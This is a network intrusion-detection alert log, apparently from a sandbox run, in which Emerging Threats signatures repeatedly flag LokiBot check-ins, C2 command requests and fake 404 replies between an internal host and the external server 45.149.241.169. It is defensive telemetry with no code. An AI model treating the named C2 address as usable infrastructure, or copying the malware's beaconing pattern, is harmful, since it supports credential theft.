2024-10-03T09:21:24.875611+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.880426+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64376 | TCP |
2024-10-03T09:21:25.029228+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.029228+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.029228+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.669335+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.669335+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.674220+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64378 | TCP |
2024-10-03T09:21:25.820375+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.820375+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.820375+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.688958+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.688958+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.693893+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64379 | TCP |
2024-10-03T09:21:26.851586+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.851586+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.851586+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.634586+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.634586+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.639571+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64380 | TCP |
2024-10-03T09:21:27.810227+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.810227+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.810227+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.548334+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.548334+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.553342+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64381 | TCP |
2024-10-03T09:21:28.697925+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.697925+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.697925+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.432337+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.432337+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.437160+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64382 | TCP |
2024-10-03T09:21:29.591807+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.591807+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.591807+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.259881+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.259881+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.264753+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64383 | TCP |
2024-10-03T09:21:30.413511+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.413511+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.413511+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.213756+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.213756+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.218885+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64384 | TCP |
2024-10-03T09:21:31.498785+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.498785+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.498785+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.591622+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.591622+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.603314+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64385 | TCP |
2024-10-03T09:21:32.743030+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.743030+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.743030+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.386243+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.386243+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.391128+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64386 | TCP |
2024-10-03T09:21:33.556187+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.556187+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.556187+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.070962+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.070962+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.071057+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64387 | TCP |
2024-10-03T09:21:35.239657+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.239657+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.239657+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.491936+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.491936+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.647501+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.647501+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.647501+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.323870+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.323870+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.328778+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64389 | TCP |
2024-10-03T09:21:47.487101+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.487101+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.487101+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.281112+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.281112+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.285934+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64390 | TCP |
2024-10-03T09:21:48.440836+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.440836+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.440836+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.089316+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.089316+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.095497+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64391 | TCP |
2024-10-03T09:21:49.258711+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.258711+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.258711+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.342573+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.342573+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.342633+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64392 | TCP |
2024-10-03T09:21:50.499694+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.499694+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.499694+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.138044+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.138044+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.142841+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64393 | TCP |
2024-10-03T09:21:51.287566+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.287566+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.287566+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.987281+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.987281+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.992201+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64394 | TCP |
2024-10-03T09:21:52.148748+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.148748+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.148748+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.824432+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.824432+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.829891+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64395 | TCP |
2024-10-03T09:21:52.981934+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.981934+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.981934+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:53.813148+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:53.813148+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:53.827051+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64396 | TCP |
2024-10-03T09:21:54.007169+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.007169+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.007169+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.779943+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.779943+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.795139+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64397 | TCP |
2024-10-03T09:21:54.945256+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.945256+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.945256+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.743930+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.743930+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.749129+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64398 | TCP |
2024-10-03T09:21:55.920209+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.920209+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.920209+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.049613+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.049613+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.080376+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64399 | TCP |
2024-10-03T09:21:57.220850+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.220850+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.220850+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.009483+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.009483+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.015493+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64400 | TCP |
2024-10-03T09:21:58.171912+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.171912+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.171912+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.968924+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.968924+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.973834+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64401 | TCP |
2024-10-03T09:21:59.151255+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.151255+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.151255+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.912717+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.912717+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.929539+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64402 | TCP |
2024-10-03T09:22:00.075267+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.075267+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.075267+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.875995+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.875995+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.880849+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64403 | TCP |
2024-10-03T09:22:01.051486+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:01.051486+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:01.051486+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:02.986735+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:02.986735+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:02.998303+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64404 | TCP |
2024-10-03T09:22:03.157629+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.157629+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.157629+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.927136+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.927136+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.932185+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64405 | TCP |
2024-10-03T09:22:04.115545+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
